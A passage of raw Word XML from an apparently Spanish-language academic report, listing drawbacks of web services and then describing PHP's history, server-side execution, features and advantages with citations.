    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Problemas al realizar transacciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rendimiento bajo comparado con otros modelos de computación distribuida como RMI (Remote Method Invocation), CORBA o DCOM. Es uno de los inconvenientes derivados de adoptar un formato basado en texto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al apoyarse en HTTP, pueden esquivar medidas de seguridad basadas en firewall cuyas reglas tratan de bloquear comunicación entre programas a ambos lados de la barrera.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64"/>
    <w:p w:rsidR="00800CB8" w:rsidRPr="00850F64" w:rsidRDefault="00800CB8" w:rsidP="00850F64"/>
    <w:p w:rsidR="00890B46" w:rsidRPr="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc514520841"/>
      <w:r w:rsidRPr="00890B46">
        <w:t>Lado servidor: Programación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="00890B46">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488"/>
    <w:p w:rsidR="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488"/>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="005702EF">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01488">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="155DA866" wp14:editId="45121EE8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1680020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>347980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2374265" cy="1280795"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="Imagen 4" descr="Resultado de imagen para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PH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74265" cy="12807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01488">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="005702EF">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="005702EF">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="005702EF">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRDefault="007D7783" w:rsidP="007D7783">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D01488" w:rsidRPr="007D7783">
        <w:t xml:space="preserve">El PHP (acrónimo de PHP: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1213" w:rsidRPr="007D7783">
        <w:t>HyperText</w:t>
      </w:r>
      <w:r w:rsidR="00D01488" w:rsidRPr="007D7783">
        <w:t xml:space="preserve"> Preprocessor), es un lenguaje interpretado de alto nivel embebido en páginas HTML y ejecutado en el servidor. El PHP inicio como una modificación a Perl escrita por Rasmus Lerdorf a finales de 1994. Su primer uso fue el de mantener un control sobre quien visitaba su Currículum en su web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7783" w:rsidRPr="007D7783" w:rsidRDefault="007D7783" w:rsidP="007D7783"/>
    <w:p w:rsidR="00D01488" w:rsidRDefault="00D01488" w:rsidP="007D7783">
      <w:r w:rsidRPr="007D7783">
        <w:tab/>
        <w:t>PHP es un lenguaje de alto nivel que se ejecuta en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7783" w:rsidRPr="007D7783" w:rsidRDefault="007D7783" w:rsidP="007D7783"/>
    <w:p w:rsidR="00D01488" w:rsidRPr="007D7783" w:rsidRDefault="00D01488" w:rsidP="007D7783">
      <w:r w:rsidRPr="007D7783">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">¿Qué quiere decir que se ejecuta en el servidor? Un lenguaje de servidor es aquél que se ejecuta en el servidor donde están alojadas las páginas, al contrario que otros lenguajes que son ejecutados en el propio navegador. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:id w:val="-1124921160"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F50132" w:rsidRPr="00330783">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F50132" w:rsidRPr="00330783">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Qui10 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F50132" w:rsidRPr="00330783">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>(Quijado, 2010)</w:t>
          </w:r>
          <w:r w:rsidR="00F50132" w:rsidRPr="00330783">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00964563" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características</w:t>
      </w:r>
      <w:r w:rsidR="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rendimiento:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Los scripts escritos en PHP se ejecutan más rápido que los escritos en otros lenguajes de creación de scripts; numerosos estudios comparativos independientes ponen este lenguaje por encima de sus competidores como JSP, ASP.NET y Perl. El motor de PHP 5.0 fue completamente rediseñado con un manejo óptimo de memoria para mejorar su rendimiento y es claramente más veloz que las versiones previas. Además, están disponibles aceleradores de terceros que pueden mejorar aún más el rendimiento y el tiempo de respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Portabilidad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP está disponible para UNIX, Microsoft Windows, Mac OS y OS/2 y los programas escritos en PHP se pueden transportar de una plataforma a otra. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fácil de usar:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> “La sencillez es la mayor sofisticación”, dijo Leonardo da Vinci y, de acuerdo con ello, PHP es un lenguaje de programación extremadamente sofisticado. Su sintaxis es clara y consistente y viene con una documentación exhaustiva para las más de 5000 funciones incluidas en la distribución principal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Código libre:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP es un proyecto de código libre; el lenguaje es desarrollado por un grupo de programadores voluntarios distribuidos por todo el mundo, quienes ponen a disposición gratuita  el código fuente a través de Internet, y puede ser utilizado sin costo, sin pagos por licencia y sin necesidad de grandes inversiones en equipo de cómputo ni programas. Con ello se reduce el costo del desarrollo de programas sin afectar la flexibilidad ni la confiabilidad de los productos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte comunitario:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una de las mejores características de los lenguajes a los que da soporte una comunidad, como PHP, es el acceso que ofrece a la </w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">creatividad e imaginación de cientos de desarrolladores ubicados en diferentes partes del mundo. En la comunidad PHP, los frutos de esta creatividad pueden ser encontrados en PEAR (PHP Extension and Application Repository), el repositorio de extensiones y aplicaciones de PHP, y en </w:t>
      </w:r>
      <w:r w:rsidR="00DB1213" w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PECL (</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PHP Extension Community Library), la biblioteca de la comunidad de extensiones PHP, que contiene cientos de soluciones y extensiones que los desarrolladores puede ocupar para añadir sin esfuerzo nuevas funcionalidades a sus aplicaciones PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte a aplicaciones de terceros:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una de las fortalezas históricas de PHP ha sido su soporte a una amplia gama de diferentes bases de datos, entre las cuales se incluyen MySQL, PostgreSQL, Oracle y Microsoft WSQL, Server. PHP 5.3 soporta más de quince diferentes motores de base de datos, e incluye una API común para el acceso a base de datos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="005E32CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La principal ventaja es que, al ejecutarse el código en el servidor, todas nuestras páginas van a poder ser vistas en cualquier ordenador, independientemente del navegador que tenga. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="-848712433"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Qui10 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
            <w:t>(Quijado, 2010)</w:t>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una de sus características es la rapidez.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es un lenguaje sencillo y fácil de estudiar y aprender.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lo soportan la mayoría de las plataformas de alojamiento web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiene ciertas características de los lenguajes orientados a objetos como la utilización de clases y herencias.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede mezclarse con código HTML, aunque esto dificulta su lectura.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede manejar ficheros y conectarse a distintas bases de datos (MySQL, Oracle, SQL Server, Informix, PostgreSQL, etcétera).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede utilizarse para generar módulos binarios CGI.</w:t>
      </w:r>
    </w:p>
